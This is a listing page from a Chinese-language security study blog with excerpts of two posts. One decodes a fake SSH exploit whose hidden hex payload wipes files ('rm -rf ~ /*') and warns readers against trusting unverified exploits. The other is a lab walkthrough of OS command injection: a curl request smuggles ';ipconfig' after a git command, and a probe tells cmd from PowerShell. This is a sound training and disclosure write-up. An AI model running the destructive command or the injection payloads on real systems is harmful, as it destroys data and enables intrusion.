發表文章

目前顯示的是有「URL encode」標籤的文章

公開的漏洞(Public Exploits)

圖片
 公開的漏洞(Public Exploits) 公開漏洞 OpenOwn 本來是針對 SSH 的漏洞攻擊程式,實際上內容非常詭異 首先是要求 root 的權限如下面這一段 if (geteuid()) {   puts("Root is required for raw sockets, etc."); return 1; } 接著往下翻可以看到一段使用 16 進制編碼的 impcode 內容如下 [...] char jmpcode[] = "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f" "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"; [...] 透過 python3 將 16 進制解碼來看 └─$ python3                     >>> jmpcode = ["\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"] >>> print(jmpcode) ['rm -rf ~ /* 2> /dev/null &'] --> 這個是從根目錄移除所有 object 的命令,且還使用了 2>/dev/null 將 standard error 丟到 null,這樣一來不小心使用到的人系統就掛了 公開漏洞資料庫 Exploit Database 由 Offsec 維護,是一個值得信賴的漏洞查找資料庫 https://www.exploit-db.com/ 另一個查找漏洞好用的網站  https://packetstormsecurity.com/ 以及訪間最多人使用的平台 GitHub  https://github.com/ 但 GitHub 上是每個人都可以任意發佈的地方所以未經驗證的漏洞利用要盡量避免 可以使用一些官方的 GitHub 帳號來使用,例如 Of...

操作系統命令注入攻擊(1)

圖片
 操作系統命令注入攻擊(1) 靶機 1 IP : 192.168.203.189 攻擊端主機 IP : 192.168.45.250 rustscan 一下,是一台 Windows 80 Port 開起來是 XAMPP 8000 Port 開起來是個支援線上 GIT Clone 備份的網站,所以看來是個命令注入攻擊的欄位   隨便打一個 git clone http://127.0.0.1/123.zip 再送到 Burp Suite 的 Repeater 執行結果是 HTTP 200 但有 Error, Error 看來是那個 http://127.0.0.1/123.zip 的關係 ipconfig 一下發現回應 Command Injection detected 單獨下 git 看看,發現輸出有 git 的 help 說明,表示網頁一定要用 git 開頭 前面有發現是 XAMPP 所以知道是 Windows 伺服器,若不是 XAMPP 架設的網站 可以透過 git version 測試看看是 Linux or Windows(Windows 版的會寫 Windows) 這次透過 curl 來測試看看,指令如下 └─$ curl -X POST --data 'Archive=git version' http://192.168.203.189:8000/archive 那就開始試試看最常用的命令注入分接方式,亦即在指令後面接 ;、&、&&、|、etc... 這些常用的試試看,但因為是網頁輸入所以要轉一下 URL Encode 從 URL Encode 測試如下圖,可以得知轉換的語法為 ; = %3B、&=%26、&&=%26%26、|=%7C 3B 那就一個一個測試看看吧,結果第一個 ;(%3B)就中獎 curl 指令 └─$ curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.203.189:8000/archive 因為是 Windows 主機,所以我要知道執行指令的用 cmd or powershell 這時候可以透過這一行指令測試 (dir 2>&1 *`|echo CMD);&...